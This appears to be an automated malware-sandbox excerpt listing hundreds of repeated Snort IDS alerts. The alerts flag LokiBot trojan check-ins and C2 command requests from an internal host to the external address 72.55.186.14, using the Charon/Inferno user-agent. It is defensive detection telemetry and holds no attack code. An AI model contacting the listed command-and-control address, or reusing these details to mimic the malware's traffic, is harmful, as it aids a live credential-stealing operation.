Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49795 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49796 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49797 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49798 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49799 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49800 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49800 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49800 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49800 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49801 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49801 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49801 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49801 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49802 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49802 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49802 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49802 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49803 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49803 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49803 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49803 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49804 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49804 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49804 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49804 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49805 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49805 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49805 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49805 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49806 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49806 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49806 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49806 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49807 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49807 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49807 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49807 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49808 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49808 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49808 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49808 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49809 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49809 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49809 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49809 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49810 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49810 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49810 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49810 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49811 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49811 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49811 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49811 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49812 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49813 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49814 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49815 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49816 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49816 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49816 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49816 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49817 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49817 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49817 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49817 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49818 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49819 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49820 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49821 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49822 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49822 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49822 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49822 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49823 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49823 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49823 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49823 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49824 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49824 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49824 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49824 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49825 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49825 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49825 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49825 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49826 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49826 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49826 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49826 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49827 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49827 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49827 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49827 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49828 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49828 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49828 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49828 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49829 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49829 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49829 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49829 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49830 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49830 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49830 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49830 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49831 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49831 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49831 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49831 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49832 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49832 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49832 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49832 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49833 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49833 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49833 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49833 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49834 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49834 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49834 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49834 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49835 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49835 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49835 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49835 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49836 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49836 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49836 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49836 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49837 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49837 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49837 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49837 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49838 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49838 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49838 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49838 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49839 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49839 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49839 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49839 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49840 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49840 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49840 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49840 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49841 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49841 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49841 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49841 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49842 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49842 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49842 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49842 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49843 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49843 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49843 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49843 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49844 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49844 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49844 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49844 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49845 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49845 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49845 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49845 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49846 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49846 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49846 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49846 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49847 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49847 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49847 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49847 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49848 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49848 -> 72.55.186.14:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49848 -> 72.55.186.14:80
